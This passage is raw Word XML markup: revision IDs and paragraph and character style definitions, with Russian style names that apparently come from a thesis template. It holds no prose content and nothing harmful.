    <w:rsid w:val="00751F4F"/>
    <w:rsid w:val="0076366D"/>
    <w:rsid w:val="00772345"/>
    <w:rsid w:val="00772F95"/>
    <w:rsid w:val="0078355F"/>
    <w:rsid w:val="007836A4"/>
    <w:rsid w:val="00786672"/>
    <w:rsid w:val="007A50F8"/>
    <w:rsid w:val="007A5439"/>
    <w:rsid w:val="007C1383"/>
    <w:rsid w:val="007C4EC7"/>
    <w:rsid w:val="007D635C"/>
    <w:rsid w:val="007F7494"/>
    <w:rsid w:val="008041DB"/>
    <w:rsid w:val="008057A3"/>
    <w:rsid w:val="00807E0C"/>
    <w:rsid w:val="00812517"/>
    <w:rsid w:val="00814744"/>
    <w:rsid w:val="00816679"/>
    <w:rsid w:val="00837241"/>
    <w:rsid w:val="0084241A"/>
    <w:rsid w:val="00875BB7"/>
    <w:rsid w:val="0088347F"/>
    <w:rsid w:val="00891157"/>
    <w:rsid w:val="00897163"/>
    <w:rsid w:val="008C2914"/>
    <w:rsid w:val="008C6A10"/>
    <w:rsid w:val="008D5BC0"/>
    <w:rsid w:val="008E0171"/>
    <w:rsid w:val="008E3BF7"/>
    <w:rsid w:val="008E40CC"/>
    <w:rsid w:val="00907A58"/>
    <w:rsid w:val="00910129"/>
    <w:rsid w:val="009113B7"/>
    <w:rsid w:val="00925110"/>
    <w:rsid w:val="009414A1"/>
    <w:rsid w:val="0095287B"/>
    <w:rsid w:val="009534A2"/>
    <w:rsid w:val="00967078"/>
    <w:rsid w:val="00973065"/>
    <w:rsid w:val="009778AD"/>
    <w:rsid w:val="00984376"/>
    <w:rsid w:val="00991C2C"/>
    <w:rsid w:val="0099286E"/>
    <w:rsid w:val="00997313"/>
    <w:rsid w:val="009A0042"/>
    <w:rsid w:val="009A57A4"/>
    <w:rsid w:val="009B37EF"/>
    <w:rsid w:val="009D3835"/>
    <w:rsid w:val="009D45A4"/>
    <w:rsid w:val="009D5D3A"/>
    <w:rsid w:val="009D6128"/>
    <w:rsid w:val="009D7303"/>
    <w:rsid w:val="009E371C"/>
    <w:rsid w:val="009E6F86"/>
    <w:rsid w:val="00A022CF"/>
    <w:rsid w:val="00A304E7"/>
    <w:rsid w:val="00A31140"/>
    <w:rsid w:val="00A4120E"/>
    <w:rsid w:val="00A4285B"/>
    <w:rsid w:val="00A7269E"/>
    <w:rsid w:val="00AA70B6"/>
    <w:rsid w:val="00AC7A1B"/>
    <w:rsid w:val="00AF0FC1"/>
    <w:rsid w:val="00AF395A"/>
    <w:rsid w:val="00AF539D"/>
    <w:rsid w:val="00B343A9"/>
    <w:rsid w:val="00B35CA3"/>
    <w:rsid w:val="00B41DBA"/>
    <w:rsid w:val="00B6429D"/>
    <w:rsid w:val="00B67365"/>
    <w:rsid w:val="00B759DF"/>
    <w:rsid w:val="00B76538"/>
    <w:rsid w:val="00B83A89"/>
    <w:rsid w:val="00B91CCB"/>
    <w:rsid w:val="00B93B26"/>
    <w:rsid w:val="00B94753"/>
    <w:rsid w:val="00B94CE4"/>
    <w:rsid w:val="00B94E2A"/>
    <w:rsid w:val="00B96ED0"/>
    <w:rsid w:val="00BA257D"/>
    <w:rsid w:val="00BB1234"/>
    <w:rsid w:val="00BB42B7"/>
    <w:rsid w:val="00BD2E7C"/>
    <w:rsid w:val="00BD4AC4"/>
    <w:rsid w:val="00BD6272"/>
    <w:rsid w:val="00BD74AB"/>
    <w:rsid w:val="00BE2712"/>
    <w:rsid w:val="00BE7195"/>
    <w:rsid w:val="00BF0A32"/>
    <w:rsid w:val="00BF1160"/>
    <w:rsid w:val="00C022BB"/>
    <w:rsid w:val="00C06C23"/>
    <w:rsid w:val="00C147D7"/>
    <w:rsid w:val="00C420D2"/>
    <w:rsid w:val="00C43C9B"/>
    <w:rsid w:val="00C57E9E"/>
    <w:rsid w:val="00C73859"/>
    <w:rsid w:val="00C878A2"/>
    <w:rsid w:val="00CA695F"/>
    <w:rsid w:val="00CB14AE"/>
    <w:rsid w:val="00CB231C"/>
    <w:rsid w:val="00CC1967"/>
    <w:rsid w:val="00CD546F"/>
    <w:rsid w:val="00CD5AEA"/>
    <w:rsid w:val="00CE094E"/>
    <w:rsid w:val="00CE4D59"/>
    <w:rsid w:val="00CF5B3F"/>
    <w:rsid w:val="00D0593C"/>
    <w:rsid w:val="00D07A04"/>
    <w:rsid w:val="00D1702E"/>
    <w:rsid w:val="00D20ACA"/>
    <w:rsid w:val="00D44A51"/>
    <w:rsid w:val="00D61EC6"/>
    <w:rsid w:val="00D70BA9"/>
    <w:rsid w:val="00D724EF"/>
    <w:rsid w:val="00D86CAD"/>
    <w:rsid w:val="00D965C6"/>
    <w:rsid w:val="00DA21CF"/>
    <w:rsid w:val="00DB5933"/>
    <w:rsid w:val="00DB7E81"/>
    <w:rsid w:val="00DD2F4C"/>
    <w:rsid w:val="00DD5A13"/>
    <w:rsid w:val="00E07AAC"/>
    <w:rsid w:val="00E250F2"/>
    <w:rsid w:val="00E27915"/>
    <w:rsid w:val="00E27EE2"/>
    <w:rsid w:val="00E62648"/>
    <w:rsid w:val="00E74B7F"/>
    <w:rsid w:val="00E77AC3"/>
    <w:rsid w:val="00E8775D"/>
    <w:rsid w:val="00E96A89"/>
    <w:rsid w:val="00EA02A1"/>
    <w:rsid w:val="00EA1A4B"/>
    <w:rsid w:val="00EA6E6B"/>
    <w:rsid w:val="00EB7AB1"/>
    <w:rsid w:val="00EC59BA"/>
    <w:rsid w:val="00ED2018"/>
    <w:rsid w:val="00ED4CBB"/>
    <w:rsid w:val="00EE6EF8"/>
    <w:rsid w:val="00F07D62"/>
    <w:rsid w:val="00F24EF6"/>
    <w:rsid w:val="00F310AD"/>
    <w:rsid w:val="00F36492"/>
    <w:rsid w:val="00F429C8"/>
    <w:rsid w:val="00F450FD"/>
    <w:rsid w:val="00F60519"/>
    <w:rsid w:val="00F65847"/>
    <w:rsid w:val="00F710AF"/>
    <w:rsid w:val="00F719D5"/>
    <w:rsid w:val="00F80C9F"/>
    <w:rsid w:val="00FA5930"/>
    <w:rsid w:val="00FC15AC"/>
    <w:rsid w:val="00FE11C5"/>
    <w:rsid w:val="00FE6462"/>
    <w:rsid w:val="00FF57AC"/>
    <w:rsid w:val="00FF5A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5F938"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F21FA705-03A6-46E2-90FF-1D72F66B1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70B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009D45A4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00230C61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>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5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>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6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>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7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"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3CF9"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="000F3CF9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F3CF9"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="000F3CF9"/>
  </w:style>
  <w:style w:type="table" w:styleId="a7">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00465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5C5EA8"/>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5C5EA8"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="ВКР - Основной"/>
    <w:qFormat/>
    <w:rsid w:val="00B96ED0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
    <w:name w:val="ВКР - Введение"/>
    <w:qFormat/>
    <w:rsid w:val="00991C2C"/>
    <w:pPr>
      <w:spacing w:after="700" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:caps/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009D45A4"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00230C61"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="Заголовок 8 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="Заголовок 9 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="Текст примечания Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="11">
    <w:name w:val="Сетка таблицы1"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a7"/>
    <w:rsid w:val="008E0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8E0171"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="008E017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f1">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>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af3">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Цитата 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="21"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af4">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008E01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af6">
    <w:name w:val="Выделенная цитата Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Lucida Sans"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="afa"/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afa">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af9"/>
    <w:rsid w:val="008E0171"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afb">
    <w:name w:val="List"/>
    <w:basedOn w:val="af9"/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:rFonts w:cs="Lucida Sans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="13">
    <w:name w:val="Заголовок1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="af9"/>
    <w:qFormat/>
    <w:rsid w:val="00B94E2A"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman" w:cs="Lucida Sans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="Указатель1"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Lucida Sans"/>
      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afc">
    <w:name w:val="Колонтитул"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="afe">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E017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0">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E0171"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
